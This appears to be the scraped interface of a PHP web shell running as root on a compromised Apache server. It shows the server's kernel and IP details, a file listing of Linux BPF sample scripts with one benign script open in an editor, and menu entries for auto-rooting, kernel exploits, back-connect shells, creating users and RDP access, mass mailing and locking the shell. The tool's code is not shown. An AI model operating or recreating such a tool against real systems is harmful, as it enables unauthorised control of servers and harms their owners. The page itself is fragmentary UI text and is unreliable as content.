Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-4.15.0-64 /
samples /
bpf /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
8.64
KB
-rw-r--r--
lwt_len_hist.sh
956
B
-rw-r--r--
run_cookie_uid_helper_example....
341
B
-rwxr-xr-x
tc_l2_redirect.sh
4.91
KB
-rwxr-xr-x
test_cgrp2_sock.sh
2.85
KB
-rwxr-xr-x
test_cgrp2_sock2.sh
1.45
KB
-rwxr-xr-x
test_cgrp2_tc.sh
4.15
KB
-rwxr-xr-x
test_cls_bpf.sh
915
B
-rwxr-xr-x
test_ipip.sh
5.59
KB
-rwxr-xr-x
test_lwt_bpf.sh
8.96
KB
-rw-r--r--
test_tunnel_bpf.sh
4.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run_cookie_uid_helper_example.sh
#!/bin/bash # SPDX-License-Identifier: GPL-2.0 local_dir="$(pwd)" root_dir=$local_dir/../.. mnt_dir=$(mktemp -d --tmp) on_exit() { iptables -D OUTPUT -m bpf --object-pinned ${mnt_dir}/bpf_prog -j ACCEPT umount ${mnt_dir} rm -r ${mnt_dir} } trap on_exit EXIT mount -t bpf bpf ${mnt_dir} ./per_socket_stats_example ${mnt_dir}/bpf_prog $1
Close